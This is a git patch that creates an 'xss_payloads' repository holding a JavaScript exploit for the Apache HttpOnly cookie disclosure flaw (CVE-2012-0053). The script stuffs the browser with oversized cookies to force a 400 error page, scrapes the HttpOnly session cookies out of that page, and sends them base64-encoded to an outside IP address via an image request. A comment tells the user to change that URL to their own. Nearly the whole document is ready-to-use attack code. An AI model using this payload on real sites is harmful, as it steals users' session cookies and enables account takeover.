From 79558b73e2a4d58ab70aa56140b5ccf52161fdb0 Mon Sep 17 00:00:00 2001
From: Strawp <github@strawp.net>
Date: Wed, 18 May 2016 14:14:39 +0100
Subject: [PATCH] first commit

---
 README.md                 |  1 +
 apache_httponly_bypass.js | 43 +++++++++++++++++++++++++++++++++++++++
 2 files changed, 44 insertions(+)
 create mode 100644 README.md
 create mode 100644 apache_httponly_bypass.js

diff --git a/README.md b/README.md
new file mode 100644
index 0000000..919ec1e
--- /dev/null
+++ b/README.md
@@ -0,0 +1 @@
+# xss_payloads
diff --git a/apache_httponly_bypass.js b/apache_httponly_bypass.js
new file mode 100644
index 0000000..4f2609a
--- /dev/null
+++ b/apache_httponly_bypass.js
@@ -0,0 +1,43 @@
+// Exploit for CVE-2012-0053
+
+// Set megacookie
+for( var j=0; j<100; j++ ){
+  var c = "x"+j+"=";
+  for( var i=0; i<500; i++ ){
+    c+='A';
+  }
+  document.cookie = c;
+}
+
+x=new XMLHttpRequest(); 
+x.onreadystatechange = function(){
+  if( x.readyState == 4 ){
+    var data = '';
+    
+    // 400 == exploit worked
+    if( x.status == 400 ){
+      aC = x.responseText.match(/<pre>([\s\S]*)<\/pre>/gm)[0].split(';');
+      for( var i=0; i<aC.length; i++ ){
+        if( !aC[i].trim().match(/x\d+=/) ){
+          data += aC[i].trim() + '; ';
+        }
+      }
+
+    // Anything else, not useful
+    }else{
+      data = "Exploit failed";
+    }
+
+    // Remove megacookie
+    for( var j=0; j<100; j++ ){
+      document.cookie = "x"+j+"=; expires=Thu, 01 Jan 1970 00:00:00 UTC";
+    }
+
+    // Send back
+    // CHANGE THIS URL TO YOUR OWN
+    new Image().src = 'http://193.36.15.252/cookie?=' + btoa(data);
+  }
+}
+x.open('GET', '/' , true ); 
+x.send(null); 
+